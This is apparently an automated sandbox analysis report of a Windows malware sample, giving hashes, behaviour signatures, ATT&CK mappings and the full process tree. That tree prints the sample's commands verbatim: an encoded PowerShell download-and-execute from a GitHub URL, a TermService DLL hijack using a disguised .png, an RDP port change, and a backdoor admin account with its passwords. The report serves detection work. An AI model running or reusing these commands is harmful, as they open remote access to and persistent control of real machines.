Analysis

  • max time kernel
    58s
  • max time network
    100s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-06-2021 14:59

General

  • Target

    20f307c716a689f4afa3a76b7143db22.exe

  • Size

    6.0MB

  • MD5

    20f307c716a689f4afa3a76b7143db22

  • SHA1

    2fd6796fd158c93b14654240533511af6fec03e5

  • SHA256

    3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd

  • SHA512

    0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe
    "C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D9.tmp" "c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMP"
          4⤵
            PID:2392
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1264
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2160
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3724
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1728
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2364
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2228
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2236
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3892
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:512
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4020
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2360
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2016
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2144
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1276
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:2232
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:2164
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2172
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3744
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3576
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:1588
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc 9gM25Ibj /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:560
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc 9gM25Ibj /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2088
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc 9gM25Ibj /add
                          3⤵
                            PID:2500
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2792
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3120
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:188
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2768
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4056
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                              3⤵
                                PID:3964
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2308
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1588
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                3⤵
                                  PID:656
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc 9gM25Ibj
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:760
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc 9gM25Ibj
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2504
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user wgautilacc 9gM25Ibj
                                  3⤵
                                    PID:1608
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1232
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:2160
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                  PID:3964
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:1728
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                  1⤵
                                    PID:2444
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      2⤵
                                        PID:4020
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Drops file in Program Files directory
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:212
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C net user wgautilacc 1234
                                      1⤵
                                        PID:1840
                                        • C:\Windows\system32\net.exe
                                          net user wgautilacc 1234
                                          2⤵
                                            PID:1728
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 user wgautilacc 1234
                                              3⤵
                                                PID:1284

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Persistence

                                          Account Manipulation

                                          1
                                          T1098

                                          Registry Run Keys / Startup Folder

                                          1
                                          T1060

                                          Defense Evasion

                                          Modify Registry

                                          2
                                          T1112

                                          Lateral Movement

                                          Remote Desktop Protocol

                                          1
                                          T1076

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Temp\RES79D9.tmp
                                            MD5

                                            735de5a4d38ceb1137c44dc8f4e61eef

                                            SHA1

                                            934174487fa9f47c17ae4e548240feca8e6e36b9

                                            SHA256

                                            115f3ef59bcc08618db55689a96ab9ed081f690397b4953f4b0573682c87dce7

                                            SHA512

                                            fb593063b564798d238ac05b1a8f195019eb36c955f6bca46750198e8e66ab913bd28422e55b383f60e1e05cab2cd77630a5e4a3865f0a298715ded6712a04a9

                                          • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                            MD5

                                            3447df88de7128bdc34942334b2fab98

                                            SHA1

                                            519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                            SHA256

                                            9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                            SHA512

                                            2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                          • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
                                            MD5

                                            920b50692e0e9c4e32c79f89fafce0c4

                                            SHA1

                                            4cb71db2bb05daa4e84c649b6c58cbfd20c8e484

                                            SHA256

                                            85fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf

                                            SHA512

                                            966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86

                                          • C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.dll
                                            MD5

                                            564cfb92500724a343fc62886af8f124

                                            SHA1

                                            d21628f28d0d011fe0326376326e631e88ac69d7

                                            SHA256

                                            330bb1972638ca1a7452892796773da631caf93930c7e2a6aa68a549fb985fb3

                                            SHA512

                                            1c7312125d543b768875a1e6ac33866dc771cddfd7baff428666f8db3275ef5052c71ea143b6b7c79c976fbc9099de182a32308106ebd0f14a7f25e616337467

                                          • \??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMP
                                            MD5

                                            59c8411fea678ce22b0a7902c98e170e

                                            SHA1

                                            3e459d07f4836529c5565131a42361bed60900b4

                                            SHA256

                                            07c70556d3be8283352d88d1d7e845e07beaadb6df77aab5f51a97a2c8d04197

                                            SHA512

                                            f8e325c988ab1f64bf018076539aa86732a929dd1d5972fb12bbd7ece577f44d179a9938b0aaa613944646cc912ff565d3927275a5cf283191b16a79d5f64158

                                          • \??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.0.cs
                                            MD5

                                            4864fc038c0b4d61f508d402317c6e9a

                                            SHA1

                                            72171db3eea76ecff3f7f173b0de0d277b0fede7

                                            SHA256

                                            0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                            SHA512

                                            9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                          • \??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdline
                                            MD5

                                            5563885b07efbdba15ff19eeec444ba9

                                            SHA1

                                            7f27f3ff9038db7a3a398438567985071f74b046

                                            SHA256

                                            a961e1d08122404998448f796a322c57557f5fd6efeeeff656ec2c6cfc9387b4

                                            SHA512

                                            120e686a29fef220c16211136a6471eff0550a77a3e6eb8ea34a6f24c0504e963466899f53663fffeaa71d86e4448ea173e2d9587ae7b952b20e812cac361fa9

                                          • \Windows\Branding\mediasrv.png
                                            MD5

                                            96a6c5d47b0670a98699b2b424e2e65e

                                            SHA1

                                            57a31831c368efd82801f94a1b72c7230f4288be

                                            SHA256

                                            bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f

                                            SHA512

                                            b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55

                                          • \Windows\Branding\mediasvc.png
                                            MD5

                                            a3da4eee0a06c45c5bec80fd959ad539

                                            SHA1

                                            a8d2d3691af2e1af85ed8947347d0981017b7a32

                                            SHA256

                                            8a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c

                                            SHA512

                                            8d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b

                                          • memory/188-230-0x0000000000000000-mapping.dmp
                                          • memory/212-242-0x00000269E5263000-0x00000269E5265000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/212-243-0x00000269E5266000-0x00000269E5268000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/212-240-0x0000000000000000-mapping.dmp
                                          • memory/212-241-0x00000269E5260000-0x00000269E5262000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/212-244-0x00000269E5268000-0x00000269E5269000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/512-216-0x0000000000000000-mapping.dmp
                                          • memory/656-234-0x0000000000000000-mapping.dmp
                                          • memory/668-117-0x0000023EFDDE3000-0x0000023EFDDE5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/668-114-0x0000023EFDDE0000-0x0000023EFDDE2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/668-119-0x0000023EFDDE6000-0x0000023EFDDE7000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/668-115-0x0000023EFE220000-0x0000023EFE641000-memory.dmp
                                            Filesize

                                            4.1MB

                                          • memory/668-118-0x0000023EFDDE5000-0x0000023EFDDE6000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1264-200-0x0000000000000000-mapping.dmp
                                          • memory/1264-205-0x0000028375626000-0x0000028375628000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1264-203-0x0000028375623000-0x0000028375625000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1264-202-0x0000028375620000-0x0000028375622000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1276-221-0x0000000000000000-mapping.dmp
                                          • memory/1284-246-0x0000000000000000-mapping.dmp
                                          • memory/1588-178-0x0000017170810000-0x0000017170812000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1588-201-0x0000017170818000-0x000001717081A000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1588-179-0x0000017170813000-0x0000017170815000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1588-182-0x0000017170816000-0x0000017170818000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1588-165-0x0000000000000000-mapping.dmp
                                          • memory/1588-226-0x0000000000000000-mapping.dmp
                                          • memory/1588-233-0x0000000000000000-mapping.dmp
                                          • memory/1608-236-0x0000000000000000-mapping.dmp
                                          • memory/1728-238-0x0000000000000000-mapping.dmp
                                          • memory/1728-245-0x0000000000000000-mapping.dmp
                                          • memory/1728-211-0x0000000000000000-mapping.dmp
                                          • memory/2016-219-0x0000000000000000-mapping.dmp
                                          • memory/2088-227-0x0000000000000000-mapping.dmp
                                          • memory/2144-220-0x0000000000000000-mapping.dmp
                                          • memory/2160-208-0x0000021D62BA6000-0x0000021D62BA8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2160-237-0x0000000000000000-mapping.dmp
                                          • memory/2160-204-0x0000000000000000-mapping.dmp
                                          • memory/2160-206-0x0000021D62BA0000-0x0000021D62BA2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2160-209-0x0000021D62BA8000-0x0000021D62BAA000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2160-207-0x0000021D62BA3000-0x0000021D62BA5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2164-247-0x0000000000000000-mapping.dmp
                                          • memory/2172-248-0x0000000000000000-mapping.dmp
                                          • memory/2228-213-0x0000000000000000-mapping.dmp
                                          • memory/2232-222-0x0000000000000000-mapping.dmp
                                          • memory/2236-214-0x0000000000000000-mapping.dmp
                                          • memory/2360-218-0x0000000000000000-mapping.dmp
                                          • memory/2364-212-0x0000000000000000-mapping.dmp
                                          • memory/2392-145-0x0000000000000000-mapping.dmp
                                          • memory/2500-228-0x0000000000000000-mapping.dmp
                                          • memory/2504-235-0x0000000000000000-mapping.dmp
                                          • memory/3028-135-0x0000022B142B0000-0x0000022B142B2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3028-144-0x0000022B142B6000-0x0000022B142B8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3028-158-0x0000022B2F850000-0x0000022B2F851000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3028-157-0x0000022B2F4C0000-0x0000022B2F4C1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3028-151-0x0000022B142B8000-0x0000022B142B9000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3028-126-0x0000022B16180000-0x0000022B16181000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3028-149-0x0000022B161D0000-0x0000022B161D1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3028-131-0x0000022B2EEE0000-0x0000022B2EEE1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3028-136-0x0000022B142B3000-0x0000022B142B5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3028-120-0x0000000000000000-mapping.dmp
                                          • memory/3120-229-0x0000000000000000-mapping.dmp
                                          • memory/3576-225-0x0000000000000000-mapping.dmp
                                          • memory/3724-210-0x0000000000000000-mapping.dmp
                                          • memory/3744-141-0x0000000000000000-mapping.dmp
                                          • memory/3892-215-0x0000000000000000-mapping.dmp
                                          • memory/3964-232-0x0000000000000000-mapping.dmp
                                          • memory/4020-239-0x0000000000000000-mapping.dmp
                                          • memory/4020-217-0x0000000000000000-mapping.dmp
                                          • memory/4056-231-0x0000000000000000-mapping.dmp